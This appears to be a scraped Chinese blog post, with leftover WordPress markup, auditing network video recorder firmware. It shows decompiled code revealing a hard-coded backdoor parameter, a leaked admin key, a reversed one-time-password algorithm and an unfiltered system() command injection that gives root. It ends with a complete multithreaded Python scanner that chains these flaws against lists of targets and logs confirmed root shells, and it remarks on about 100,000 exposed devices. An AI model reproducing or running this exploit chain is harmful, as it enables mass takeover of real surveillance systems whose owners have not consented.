![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-1024x573.png\")
<\/div><\/figure>\n\n\n\n<\/p>\n\n\n\n
int __fastcall check_login_param(int a1, int a2)\n{\n char s[256];\n memset(s, 0, sizeof(s));\n s1 = (char *)cgi_param(\"_f_auth\");\n if ( s1 )\n {\n if ( !strcmp(s1, \"__jake924__\") ) \/\/ \u2190 \u786c\u7f16\u7801\u540e\u95e8\n return sub_3310(a1, -1, 0); \/\/ \u2190 \u6ce8\u518c admin session\n return 0;\n }\n\n}<\/code><\/pre>\n\n\n\n\u518d\u770bsub_3310\u51fd\u6570 (session \u6ce8\u518c):<\/p>\n\n\n\n![\"\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\nlibcgi_common.so \u7684 check_login_param() \u51fd\u6570\u4e2d\u5b58\u5728\u786c\u7f16\u7801\u540e\u95e8\u3002\u5f53 CGI \u53c2\u6570 _f_auth \u7b49\u4e8e jake924\u65f6\uff0c\u76f4\u63a5\u8df3\u8fc7\u8ba4\u8bc1\uff0c\u6ce8\u518c\u7ba1\u7406\u5458 session\u3002<\/p>\n\n\n\n
\u53d7\u5f71\u54cd CGI (\u5bfc\u5165\u4e86 check_login_param):<\/p>\n\n\n\n
\/cgi-bin\/setup.cgi<\/p>\n\n\n\n
\/cgi-bin\/getParam.cgi<\/p>\n\n\n\n
\/cgi-bin\/update_save.cgi<\/p>\n\n\n\n
\/cgi-bin\/live_monitoring.cgi<\/p>\n\n\n\n
\/cgi-bin\/vod_playback.cgi<\/p>\n\n\n\n
\u8bf7\u6c42\u5305<\/p>\n\n\n\n
GET \/cgi-bin\/setup.cgi?_f_auth=__jake924__ HTTP\/1.1<\/code><\/pre>\n\n\n\n\u9a8c\u8bc1\u540e\u95e8\u751f\u6548: \u65e0\u540e\u95e8\u65f6\u54cd\u5e94 143B (\u91cd\u5b9a\u5411\/\u7a7a\u9875\u9762)\uff0c\u6709\u540e\u95e8\u65f6\u54cd\u5e94 17276B (\u5b8c\u6574\u7ba1\u7406\u9875\u9762)\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u83b7\u53d6 Admin Console KEY<\/p>\n\n\n\n
\u539f\u7406<\/strong>: admin_console.cgi \u9875\u9762\u5728 HTML \u6e90\u7801\u4e2d\u4ee5 readonly input \u660e\u6587\u663e\u793a KEY \u503c\u3002<\/p>\n\n\n\n\u8bf7\u6c42<\/strong> (\u643a\u5e26 Step 1 \u7684 session cookie):<\/p>\n\n\n\nGET \/cgi-bin\/admin_console.cgi HTTP\/1.1\nHost: \nCookie: CGISID=flnT1F2oJiXAER6xohFspAGQPErefP7uatea17qBpmd5c<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u54cd\u5e94\u5173\u952e\u884c<\/strong>:<\/p>\n\n\n\n<input id=”key” type=”text” style=”width: 200px” value=”117CD709-D8654A1A” readonly\/><\/p>\n\n\n\n
\u63d0\u53d6 KEY<\/strong>: 117CD709-D8654A1A<\/p>\n\n\n\nKEY \u6765\u6e90: \u5b58\u50a8\u5728 \/tmp\/_admin_console.key \u6587\u4ef6\u4e2d\uff0c\u7531\u8bbe\u5907\u9996\u6b21\u542f\u52a8\u65f6\u968f\u673a\u751f\u6210\uff0c\u683c\u5f0f\u4e3a XXXXXXXX-XXXXXXXX (\u5341\u516d\u8fdb\u5236)\u3002<\/p>\n\n\n\n
\u83b7\u53d6\u8bbe\u5907\u65e5\u671f<\/p>\n\n\n\n
\u539f\u7406<\/strong>: OTP \u4ee5\u8bbe\u5907\u5f53\u524d\u65e5\u671f\u4e3a\u79cd\u5b50\u4e4b\u4e00\u3002\u9700\u8981\u8bfb\u53d6\u8bbe\u5907\u65f6\u95f4\u800c\u975e\u653b\u51fb\u673a\u65f6\u95f4\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8bf7\u6c42<\/strong>:<\/p>\n\n\n\nGET \/cgi-bin\/setup_system_information.cgi HTTP\/1.1\nHost: <target>\nCookie: CGISID=flnT1F2oJiXAER6xohFspAGQPErefP7uatea17qBpmd5c<\/code><\/pre>\n\n\n\n\u54cd\u5e94<\/strong>:<\/p>\n\n\n\nvar cur_year = \"2026\";\nvar cur_month = \"3\"; \/\/ JavaScript 0-based: 0=Jan, 3=Apr\nvar cur_day = \"16\";\nvar cur_hour = \"0\";\nvar cur_min = \"33\";<\/code><\/pre>\n\n\n\n\u65e5\u671f\u8f6c\u6362: JavaScript month \u662f 0-based, \u9700\u8981 +1:<\/p>\n\n\n\n
cur_month=3 \u2192 \u5b9e\u9645\u6708\u4efd = 4 (April)<\/p>\n\n\n\n
\u683c\u5f0f\u5316: 04\/16\/2026<\/p>\n\n\n\n
\u8ba1\u7b97 OTP<\/p>\n\n\n\n
\u7b97\u6cd5\u9006\u5411 (IDA \u53cd\u7f16\u8bd1 admin_console_core.cgi sub_10990):<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nint sub_10990()\n{\n int v0; \/\/ r0\n int v1; \/\/ r0\n int v2; \/\/ r0\n const char *v3; \/\/ r6\n int v4; \/\/ r0\n bool v5; \/\/ zf\n const char *v6; \/\/ r5\n const char *v7; \/\/ r1\n FILE *v8; \/\/ r0\n FILE *v9; \/\/ r4\n __time_t tv_sec; \/\/ r7\n int v11; \/\/ r0\n size_t v12; \/\/ r0\n const char *v13; \/\/ r1\n int v14; \/\/ r2\n int v15; \/\/ r0\n int v16; \/\/ r12\n char *v17; \/\/ r3\n unsigned int v18; \/\/ lr\n _BOOL4 v19; \/\/ lr\n const char *v20; \/\/ r0\n const char *v21; \/\/ r0\n const char *v22; \/\/ r4\n size_t v23; \/\/ r0\n FILE *v24; \/\/ r0\n FILE *v25; \/\/ r4\n int v26; \/\/ r0\n time_t timer; \/\/ [sp+Ch] [bp-248h] BYREF\n __int64 v29; \/\/ [sp+10h] [bp-244h] BYREF\n _DWORD v30[4]; \/\/ [sp+1Ch] [bp-238h] BYREF\n char v31[32]; \/\/ [sp+2Ch] [bp-228h] BYREF\n struct tm tp; \/\/ [sp+4Ch] [bp-208h] BYREF\n char s[64]; \/\/ [sp+78h] [bp-1DCh] BYREF\n char s2[4]; \/\/ [sp+B8h] [bp-19Ch] BYREF\n _BYTE v35[60]; \/\/ [sp+BCh] [bp-198h] BYREF\n double v36[9]; \/\/ [sp+F8h] [bp-15Ch] BYREF\n int v37; \/\/ [sp+140h] [bp-114h]\n int v38; \/\/ [sp+144h] [bp-110h]\n int v39; \/\/ [sp+148h] [bp-10Ch]\n int v40; \/\/ [sp+14Ch] [bp-108h]\n struct timeval tv; \/\/ [sp+150h] [bp-104h] BYREF\n\n v0 = cgi_init();\n v1 = cgi_session_start(v0);\n v2 = cgi_process_form(v1);\n cgi_init_headers(v2);\n load_setup(&unk_22198);\n v3 = (const char *)cgi_param(\"key\");\n v4 = cgi_param(\"pwd\");\n v5 = v4 == 0;\n if ( v4 )\n v5 = v3 == 0;\n v6 = (const char *)v4;\n if ( v5 )\n goto LABEL_5;\n memset(s, 0, sizeof(s));\n v8 = (FILE *)fopen64(\"\/tmp\/_admin_console.key\", \"rb\");\n v9 = v8;\n if ( v8 )\n {\n fread(s, 1u, 0x40u, v8);\n fclose(v9);\n }\n if ( strcmp(s, v3) )\n {\n v7 = \"<font color='red'>key is not matched!<\/font>\";\n goto LABEL_31;\n }\n *(_DWORD *)s2 = 0;\n memset(v35, 0, sizeof(v35));\n gettimeofday(&tv, 0);\n tv_sec = tv.tv_sec;\n v11 = sub_11900(tv.tv_usec, 1000);\n timer = sub_11B40(1000 * tv_sec + v11, (unsigned __int64)(1000LL * tv_sec + v11) >> 32, 1000, 0);\n localtime_r(&timer, &tp);\n snprintf(v31, 0x20u, \"%02d\/%02d\/%04d\", tp.tm_mon + 1, tp.tm_mday, tp.tm_year + 1900);\n snprintf((char *)&tv, 0x100u, \"$$_NVR ONETIME PWD IS '%s' AND '%s' AND JAKE 700924_$$\", v31, v3);\n memset(v30, 0, sizeof(v30));\n v12 = strlen((const char *)&tv);\n v37 = 271733878;\n v36[0] = 0.0;\n v38 = -1732584194;\n v39 = -271733879;\n v40 = 1732584193;\n sub_10EC8(v36, &tv, v12);\n v13 = (const char *)&unk_11DBD;\n *(_QWORD *)&v29 = vshld_n_s64(*(__int64 *)&v36[0], 3u);\n while ( 1 )\n {\n sub_10EC8(v36, v13, 1);\n if ( (LOBYTE(v36[0]) & 0x3F) == 0x38 )\n break;\n v13 = \"\";\n }\n sub_10EC8(v36, (__int64 *)&v29, 8);\n v14 = 0;\n v15 = 0;\n v16 = 0;\n v30[0] = v40;\n v30[1] = v39;\n v30[2] = v38;\n v30[3] = v37;\n v17 = s2;\n do\n {\n v15 += 8;\n v16 = *((unsigned __int8 *)v30 + v14) + (v16 << 8);\n do\n {\n do\n {\n v18 = (unsigned int)(v16 << 6) >> v15;\n v15 -= 6;\n *v17++ = aAbcdefghijklmn[v18 & 0x3F];\n }\n while ( v15 > 6 );\n v19 = v15 > 0;\n if ( v14 != 7 )\n v19 = 0;\n }\n while ( v19 );\n ++v14;\n }\n while ( v14 != 8 );\n while ( ((unsigned __int8)v17 & 3) != 0 )\n *v17++ = 61;\n *v17 = 0;\n if ( strcmp(v6, s2) )\n {\nLABEL_5:\n v7 = \"<font color='red'>no permit<\/font>\";\nLABEL_31:\n strcpy(&dest, v7);\n goto LABEL_32;\n }\n v20 = (const char *)cgi_param(\"category\");\n dest = 0;\n if ( !strcmp(v20, \"system_cmd\") )\n {\n v21 = (const char *)cgi_param(\"cmd\");\n v22 = v21;\n if ( v21 )\n {\n if ( *v21 )\n {\n v23 = strlen(v21);\n if ( v22[v23] == 13 )\n v22[v23] = 0;\n unlink(\"\/tmp\/_admin_console\");\n setenv(\"LD_LIBRARY_PATH\", \"$LD_LIBRARY_PATH:\/edvr2\/lib:\/main\/lib\", 1);\n setenv(\"PATH\", \"\/bin:\/sbin:\/usr\/bin:\/usr\/sbin:\/usr\/bin\/X11:\/usr\/local\/bin\", 1);\n snprintf(command, 0x40000u, \"%s &> \/tmp\/_admin_console\", v22);\n system(command);\n v24 = (FILE *)fopen64(\"\/tmp\/_admin_console\", \"rb\");\n v25 = v24;\n if ( !v24 )\n {\n v7 = \"<font color=red>no output<\/font>\";\n goto LABEL_31;\n }\n fread(&dest, 1u, 0x40000u, v24);\n fclose(v25);\n }\n }\n }\nLABEL_32:\n v26 = ajax_check_output(&dest, 0);\n cgi_end(v26);\n return 0;\n}<\/code><\/pre>\n\n\n\n\u53d1\u73b0 OTP \u53ea\u7528 MD5 \u6458\u8981\u7684\u524d 8 \u5b57\u8282\u505a Base64 \u7f16\u7801 (\u5faa\u73af\u8fb9\u754c v14 == 7)\uff0c\u4e0d\u662f\u5b8c\u6574 16 \u5b57\u8282\u3002<\/p>\n\n\n\n
Python \u5b9e\u73b0:<\/p>\n\n\n\n
import hashlib, base64\n\nKEY = \"117CD709-D8654A1A\"\nDATE = \"04\/16\/2026\" # MM\/DD\/YYYY, \u4ece\u8bbe\u5907\u8bfb\u53d6\n\nseed = f\"$$_NVR ONETIME PWD IS '{DATE}' AND '{KEY}' AND JAKE 700924_$$\"\nmd5_digest = hashlib.md5(seed.encode()).digest()\notp = base64.b64encode(md5_digest[:8]).decode() # \u53ea\u53d6\u524d8\u5b57\u8282!\n\nprint(f\"OTP: {otp}\")\n# \u8f93\u51fa: OTP: U7EtabS2H\/E=<\/code><\/pre>\n\n\n\n
\n\n\n\n\u6267\u884c\u547d\u4ee4<\/p>\n\n\n\n
\u539f\u7406: admin_console_core.cgi \u7684 system_cmd\u5206\u652f\u5c06 cmd\u53c2\u6570\u96f6\u8fc7\u6ee4\u76f4\u63a5\u62fc\u5165system() \u8c03\u7528\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nIDA \u53cd\u7f16\u8bd1<\/strong>:<\/p>\n\n\n\nv20 = (const char *)cgi_param(\"category\");\n dest = 0;\n if ( !strcmp(v20, \"system_cmd\") )\n {\n v21 = (const char *)cgi_param(\"cmd\");\n v22 = v21;\n if ( v21 )\n {\n if ( *v21 )\n {\n v23 = strlen(v21);\n if ( v22[v23] == 13 )\n v22[v23] = 0;\n unlink(\"\/tmp\/_admin_console\");\n setenv(\"LD_LIBRARY_PATH\", \"$LD_LIBRARY_PATH:\/edvr2\/lib:\/main\/lib\", 1);\n setenv(\"PATH\", \"\/bin:\/sbin:\/usr\/bin:\/usr\/sbin:\/usr\/bin\/X11:\/usr\/local\/bin\", 1);\n snprintf(command, 0x40000u, \"%s &> \/tmp\/_admin_console\", v22);\n system(command);\n v24 = (FILE *)fopen64(\"\/tmp\/_admin_console\", \"rb\");\n v25 = v24;\n if ( !v24 )\n {\n v7 = \"<font color=red>no output<\/font>\";\n goto LABEL_31;\n }\n fread(&dest, 1u, 0x40000u, v24);\n fclose(v25);\n }\n }\n }<\/code><\/pre>\n\n\n\n\u8bf7\u6c42<\/strong>:<\/p>\n\n\n\nGET \/cgi-bin\/admin_console_core.cgi?key=117CD709-D8654A1A&pwd=U7EtabS2H\/E=&category=system_cmd&cmd=id HTTP\/1.1\nHost: <target><\/code><\/pre>\n\n\n\ncurl -k \"http:\/\/<target>\/cgi-bin\/admin_console_core.cgi?key=117CD709-D8654A1A&pwd=U7EtabS2H%2FE%3D&category=system_cmd&cmd=id\"<\/code><\/pre>\n\n\n\n\u54cd\u5e94<\/strong>:<\/p>\n\n\n\nuid=0(root) gid=0(root)<\/code><\/pre>\n\n\n\n\u6f0f\u6d1e\u5229\u7528\u94fe<\/p>\n\n\n\n
\u653b\u51fb\u8005\n \u2502\n \u2502 GET \/cgi-bin\/setup.cgi?_f_auth=__jake924__\n \u25bc\n[VULN-01] check_login_param() \u540e\u95e8\n \u2502 strcmp(user_input, \"__jake924__\") == 0\n \u2502 \u2192 sub_3310(a1, -1, 0)\n \u2502 \u2192 cgi_session_register_var(\"logon\", \"0\") \/\/ admin\n \u2502 \u2190 Set-Cookie: CGISID=xxx\n \u25bc\n\u653b\u51fb\u8005 (\u6301\u6709 admin session)\n \u2502\n \u2502 GET \/cgi-bin\/admin_console.cgi\n \u25bc\n[VULN-02] KEY \u660e\u6587\u6cc4\u9732\n \u2502 <input id=\"key\" value=\"117CD709-D8654A1A\" readonly\/>\n \u2502 \u2190 KEY = \"117CD709-D8654A1A\"\n \u25bc\n\u653b\u51fb\u8005 (\u6301\u6709 KEY)\n \u2502\n \u2502 GET \/cgi-bin\/setup_system_information.cgi\n \u2502 \u2190 cur_month=\"3\" cur_day=\"16\" cur_year=\"2026\"\n \u2502 \u2192 date = \"04\/16\/2026\" (JS month 0-based, +1)\n \u25bc\n[VULN-03] OTP \u79bb\u7ebf\u8ba1\u7b97\n \u2502 seed = \"$$_NVR ONETIME PWD IS '04\/16\/2026' AND '117CD709-D8654A1A' AND JAKE 700924_$$\"\n \u2502 OTP = Base64( MD5(seed)[0:8] )\n \u2502 \u2192 OTP = \"U7EtabS2H\/E=\"\n \u25bc\n\u653b\u51fb\u8005 (\u6301\u6709 KEY + OTP)\n \u2502\n \u2502 GET \/cgi-bin\/admin_console_core.cgi\n \u2502 ?key=117CD709-D8654A1A\n \u2502 &pwd=U7EtabS2H\/E=\n \u2502 &category=system_cmd\n \u2502 &cmd=id\n \u25bc\n[VULN-04] system() RCE\n \u2502 cgi_param(\"cmd\") \u2192 v22\n \u2502 snprintf(command, 0x40000, \"%s &> \/tmp\/_admin_console\", v22)\n \u2502 system(command) \/\/ \u96f6\u8fc7\u6ee4, \u76f4\u63a5\u6267\u884c\n \u2502 fopen(\"\/tmp\/_admin_console\") \u2192 fread \u2192 \u8fd4\u56de\u8f93\u51fa\n \u2502\n \u25bc\nuid=0(root) gid=0(root)<\/code><\/pre>\n\n\n\n\u4e00\u952e\u5229\u7528\u811a\u672c<\/p>\n\n\n\n
#!\/usr\/bin\/env python3
import sys
import os
import re
import hashlib
import base64
import socket
import argparse
import csv
import threading
import concurrent.futures
from datetime import datetime
socket.setdefaulttimeout(15)
try:
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
print(\"[!] pip install requests\")
sys.exit(1)
BACKDOOR_PARAM = \"_f_auth\"
BACKDOOR_VALUE = \"__jake924__\"
OTP_SALT = \"$$_NVR ONETIME PWD IS '%s' AND '%s' AND JAKE 700924_$$\"
BACKDOOR_CGIS = [
\"\/cgi-bin\/setup.cgi\",
\"\/cgi-bin\/getParam.cgi\",
\"\/cgi-bin\/update_save.cgi\",
\"\/cgi-bin\/live_monitoring.cgi\",
\"\/cgi-bin\/vod_playback.cgi\",
]
CSV_FIELDS = [\"target\", \"status\", \"server\", \"key\", \"date\", \"otp\", \"rce_output\", \"timestamp\"]
csv_lock = threading.Lock()
def s(timeout=10):
sess = requests.Session()
sess.verify = False
sess.headers[\"User-Agent\"] = \"Mozilla\/5.0 (compatible)\"
return sess
def g(sess, url, timeout=10, **kw):
try:
return sess.get(url, timeout=timeout, **kw)
except:
return None
def is_dw(target, timeout=8):
sess = s()
r = g(sess, f\"{target}\/cgi-bin\/login.cgi\", timeout, allow_redirects=True)
if r is None:
r = g(sess, f\"{target}\/\", timeout)
if r is None:
return False, \"\"
server = r.headers.get(\"Server\", \"\")
body = r.text.lower()
hit = any(k in body for k in [\"digital-watchdog\", \"vmax\", \"login_proc.cgi\",
\"cgi-bin_mobile\", \"redirect_mobile_check\",
\"rsa_pub_key\"]) or \"fwebserver\" in server.lower()
return hit, server
def try_rce(target, timeout=10):
for cgi in BACKDOOR_CGIS:
sess = s()
r = g(sess, f\"{target}{cgi}\", timeout, allow_redirects=False,
params={BACKDOOR_PARAM: BACKDOOR_VALUE})
if r is None:
continue
key = None
r2 = g(sess, f\"{target}\/cgi-bin\/admin_console.cgi\", timeout)
if r2:
m = re.search(r'id=\"key\"[^>]*value=\"([^\"]*)\"', r2.text)
if m:
key = m.group(1)
date_str = datetime.now().strftime(\"%m\/%d\/%Y\")
r3 = g(sess, f\"{target}\/cgi-bin\/setup_system_information.cgi\", timeout)
if r3:
mm = re.search(r'cur_month\\s*=\\s*\"(\\d+)\"', r3.text)
dd = re.search(r'cur_day\\s*=\\s*\"(\\d+)\"', r3.text)
yy = re.search(r'cur_year\\s*=\\s*\"(\\d+)\"', r3.text)
if mm and dd and yy:
date_str = f\"{int(mm.group(1))+1:02d}\/{int(dd.group(1)):02d}\/{yy.group(1)}\"
keys = []
if key:
keys.append(key)
keys.extend([\"\", \"admin\", \"root\", \"default\"])
for k in keys:
seed = OTP_SALT % (date_str, k)
otp = base64.b64encode(hashlib.md5(seed.encode()).digest()[:8]).decode()
r4 = g(sess, f\"{target}\/cgi-bin\/admin_console_core.cgi\", timeout + 5,
params={\"key\": k, \"pwd\": otp, \"category\": \"system_cmd\", \"cmd\": \"id\"})
if r4 is None:
continue
body = r4.text
if \"404\" in body and \"Not Found\" in body:
return None, None, None, None
clean = re.sub(r'<\/?xmp>', '', body).strip()
if \"uid=\" in clean:
return k, date_str, otp, clean
return None, None, None, None
def scan_one(target, timeout, csv_writer, csv_file):
row = {\"target\": target, \"status\": \"OFFLINE\", \"server\": \"\", \"key\": \"\",
\"date\": \"\", \"otp\": \"\", \"rce_output\": \"\",
\"timestamp\": datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")}
hit, server = is_dw(target, timeout)
if not hit:
if server or hit is not None:
row[\"status\"] = \"NOT_DW\"
row[\"server\"] = server
flush_row(csv_writer, csv_file, row)
return row
row[\"server\"] = server
row[\"status\"] = \"DW_CAM\"
key, date_str, otp, output = try_rce(target, timeout)
if output and \"uid=\" in output:
row[\"status\"] = \"RCE\"
row[\"key\"] = key or \"\"
row[\"date\"] = date_str or \"\"
row[\"otp\"] = otp or \"\"
row[\"rce_output\"] = output.replace(\"\\n\", \" \")[:300]
if row[\"status\"] == \"RCE\":
flush_row(csv_writer, csv_file, row)
return row
def flush_row(writer, f, row):
with csv_lock:
writer.writerow(row)
f.flush()
def load_targets(src):
targets = []
if os.path.isfile(src):
with open(src, \"r\", encoding=\"utf-8\") as f:
for line in f:
line = line.strip()
if line and not line.startswith(\"#\"):
if not line.startswith(\"http\"):
line = f\"http:\/\/{line}\"
targets.append(line.rstrip(\"\/\"))
else:
for t in src.split(\",\"):
t = t.strip()
if t:
if not t.startswith(\"http\"):
t = f\"http:\/\/{t}\"
targets.append(t.rstrip(\"\/\"))
return targets
def main():
print(\"\"\"
DW\/HiSilicon Batch RCE Scanner
===============================\"\"\")
pa = argparse.ArgumentParser()
pa.add_argument(\"-t\", \"--targets\", required=True, help=\"file or comma-separated IPs\")
pa.add_argument(\"-T\", \"--timeout\", type=int, default=10)
pa.add_argument(\"-w\", \"--workers\", type=int, default=50)
pa.add_argument(\"-o\", \"--output\", default=\"C:\/tmp\/dw_batch_full.csv\")
a = pa.parse_args()
targets = load_targets(a.targets)
if not targets:
print(\"[!] No targets\")
sys.exit(1)
total = len(targets)
print(f\"[*] Targets: {total} Workers: {a.workers} Timeout: {a.timeout}s\")
print(f\"[*] Output: {a.output}\")
print(\"=\" * 70)
csv_f = open(a.output, \"w\", newline=\"\", encoding=\"utf-8\")
writer = csv.DictWriter(csv_f, fieldnames=CSV_FIELDS)
writer.writeheader()
csv_f.flush()
stats = {\"rce\": 0, \"dw\": 0, \"offline\": 0, \"not_dw\": 0}
def worker(t):
return scan_one(t, a.timeout, writer, csv_f)
try:
with concurrent.futures.ThreadPoolExecutor(max_workers=a.workers) as pool:
futs = {pool.submit(worker, t): t for t in targets}
for i, fut in enumerate(concurrent.futures.as_completed(futs), 1):
try:
r = fut.result(timeout=a.timeout * 8)
except Exception:
r = {\"target\": futs[fut], \"status\": \"ERROR\"}
st = r.get(\"status\", \"\")
if st == \"RCE\":
stats[\"rce\"] += 1
out = r.get(\"rce_output\", \"\")[:80]
print(f\"[{i}\/{total}] [!!!] RCE {r['target']} KEY={r.get('key','')} {out}\")
elif st == \"DW_CAM\":
stats[\"dw\"] += 1
if i % 200 == 0 or i == total:
print(f\"[{i}\/{total}] scanning... RCE={stats['rce']} DW={stats['dw']}\")
elif st == \"OFFLINE\":
stats[\"offline\"] += 1
else:
stats[\"not_dw\"] += 1
finally:
csv_f.close()
print(\"\\n\" + \"=\" * 70)
print(f\"\"\"[*] DONE
Total: {total}
RCE: {stats['rce']}
DW Cam: {stats['dw']}
Offline: {stats['offline']}
Not DW: {stats['not_dw']}
Output: {a.output}\"\"\")
if stats[\"rce\"] > 0:
print(f\"\\n[!!!] {stats['rce']} confirmed RCE (uid=root):\")
with open(a.output, \"r\", encoding=\"utf-8\") as f:
for row in csv.DictReader(f):
if row[\"status\"] == \"RCE\":
print(f\" {row['target']} KEY={row['key']} {row['rce_output'][:60]}\")
if __name__ == \"__main__\":
main()
<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"\u5f88\u4e45\u6ca1\u6709\u66f4\u65b0\u6587\u7ae0\u4e86\uff0c\u53d1\u4e00\u7bc7\u5e93\u5b58\uff0c\u5206\u4eab\u4e00\u4e0b\u5ba1\u8ba1\u8fc7\u7a0b\u548c\u601d\u8def\uff0c\u5927\u5bb6\u53ef\u4ee5\u4e00\u8d77\u5b66\u4e60 \u8fd9\u4e2a\u8bbe\u5907\u7684\u6f0f\u6d1e\u5168\u7f51\u5927\u698210w\u4e2a\u76ee\u6807\u5427 […]<\/p>\n","protected":false},"author":1,"featured_media":291,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[19],"tags":[18,6],"class_list":["post-281","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-19","tag-18","tag-6"],"jetpack_featured_media_url":"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/25675212_p0.jpg","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=281"}],"version-history":[{"count":1,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/281\/revisions"}],"predecessor-version":[{"id":292,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/281\/revisions\/292"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/media\/291"}],"wp:attachment":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=281"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-1.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-2.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-3.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-4-1024x558.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-5-1024x537.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-6-1024x557.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-7-1024x461.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/05\/image-8-1024x496.png\")
<\/div><\/figure>\n\n\n\n